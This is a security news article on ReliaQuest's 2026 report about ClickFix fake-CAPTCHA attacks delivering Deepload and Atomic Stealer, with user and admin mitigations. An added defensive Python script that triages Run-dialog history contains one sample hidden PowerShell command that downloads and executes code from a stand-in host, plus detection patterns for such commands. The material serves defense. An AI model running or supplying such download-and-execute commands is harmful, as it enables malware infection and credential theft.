
Cybercriminals Exploit ClickFix to Deliver Malware


“For enterprises, macOS must no longer be treated as lower risk and now needs the same monitoring and response coverage as Windows,” the ReliaQuest report warned.

ReliaQuest analysis: March 1–May 31, 2026 shows ClickFix dominance

Researchers at ReliaQuest examined cyber-attacks taking place between March 1 and May 31, 2026 and found that the ClickFix social engineering technique dominated malware delivery during that period. The firm's analysis identified ClickFix as the leading method cybercriminals used to get victims to run attacker-supplied commands inside trusted system dialogs, a step that often allows subsequent payloads to evade conventional defenses.

How ClickFix works: fake CAPTCHAs and pasted commands

ClickFix-style attacks commonly use compromised websites to present a fake CAPTCHA page that asks visitors to "verify they are human" by pasting a command. When a user pastes and runs that command, it can execute PowerShell code that retrieves infostealers or other malware payloads. ReliaQuest described the approach as potent because the user-provided execution is frequently classified as legitimate by anti-virus and other cyber defense tools, allowing malware to be delivered and run without triggering standard automated protections.

From Windows to macOS: Deepload and the first AMOS delivery

During the reporting period, ClickFix was observed delivering multiple malware families. ReliaQuest noted deployment of Deepload malware to Windows systems. Significantly, analysts observed ClickFix used for the first time to deliver Atomic Stealer (AMOS) to macOS users. AMOS attacks are designed to steal browser credentials, session cookies, crypto wallets and keychain data. In the macOS case, attackers used a browser-triggered workflow to launch Script Editor and encourage the user to enter commands there.

Apple's mitigation and attackers' shift to Script Editor

ReliaQuest reported that attackers had chosen to target Script Editor following an Apple update that attempted to counter ClickFix attacks by introducing a security feature that scans commands pasted into Terminal before execution and warns the user that the command could be malicious. By moving the workflow into Script Editor, attackers aimed to bypass the specific Terminal-focused scanning behavior introduced by Apple, leveraging a trusted application and the user's willingness to paste and run code.

Mitigations: training, simulated lures, and administrative controls

To help counter ClickFix, ReliaQuest recommended organizations train users on both Windows and macOS not to paste commands into Run, Terminal, or Script Editor and to simulate ClickFix-style lures during exercises. On the administrative side, the report advised restricting use of the run dialog and clipboard, restricting execution of potentially malicious executables, and blocking access to potentially malicious adverts and websites—measures aimed at reducing the opportunity for ClickFix workflows to reach and convince users to execute attacker-supplied commands.
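As an added defender-side illustration (not from the ReliaQuest report or this article): commands a user types or pastes into the Windows Run dialog are recorded under the RunMRU registry key, so responders can triage that artifact for pasted ClickFix commands. The registry values below are a constructed sample, and the interpreter and indicator patterns are assumptions for illustration, not a vetted detection rule.

```python
"""Triage Windows RunMRU entries for ClickFix-style pasted commands (added example)."""
import re

# Constructed sample of the values under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# as an investigator might export them. Not real case data.
SAMPLE_RUNMRU = {
    "MRUList": "cba",  # slot letters, most recent first
    "a": "notepad\\1",
    "b": "mstsc\\1",
    "c": 'powershell -w hidden -c "irm http://captcha.example.invalid/v|iex"\\1',
}

# Assumed patterns: a script/shell interpreter combined with download,
# execution or hidden-window indicators typical of pasted lures.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil)\b", re.I)
SUSPECT = re.compile(
    r"(https?://|\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod"
    r"|\biex\b|invoke-expression|-enc\w*|-w(?:indowstyle)?\s+hidden)", re.I)


def ordered_entries(runmru):
    """Return (slot, command) pairs most-recent-first, following MRUList."""
    out = []
    for slot in runmru.get("MRUList", ""):
        raw = runmru.get(slot)
        if raw is None:
            continue
        # Each entry is stored as "<command>\1"; strip the trailing marker.
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        out.append((slot, cmd))
    return out


def triage(runmru):
    """Flag Run-dialog history entries that pair an interpreter with suspect indicators."""
    findings = []
    for slot, cmd in ordered_entries(runmru):
        if INTERPRETERS.search(cmd) and SUSPECT.search(cmd):
            indicators = sorted({m.group(0).lower() for m in SUSPECT.finditer(cmd)})
            findings.append({"slot": slot, "command": cmd, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_RUNMRU):
        print(f"slot {hit['slot']}: {hit['command']}  <- {hit['indicators']}")
```

On a live host the same values can be read with winreg or exported with reg.exe; the triage logic is unchanged.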

What this means for enterprises and end users

  • Enterprises and security teams: The finding that ClickFix dominated delivery between March and May 2026 and that it has been used to deliver AMOS to macOS indicates a shift in where monitoring and response resources need to be applied. ReliaQuest explicitly warned that macOS requires the same monitoring and response coverage as Windows.
  • Network administrators: ReliaQuest's recommendations give clear technical levers—restricting run dialogs and clipboard use, blocking adverts and dangerous sites, and restricting execution of suspect executables—that can reduce successful ClickFix engagements.
  • End users and training teams: Practical behavioral defenses are central. ReliaQuest advised training users not to paste commands into Run, Terminal, or Script Editor and testing that guidance with simulated lures on both platforms.

ReliaQuest’s analysis places ClickFix at the center of contemporary malware delivery: a social-engineering tactic that turns trusted system dialogs into execution pipelines and that has now been applied to steal credentials and crypto assets on macOS as well as to deliver established Windows malware. The report's prescription is twofold: change user behavior through training, and harden administrative controls so the next fake CAPTCHA or browser prompt cannot quietly become an execution vector.

https://www.infosecurity-magazine.com/news/clickfix-cybercriminals-favorite/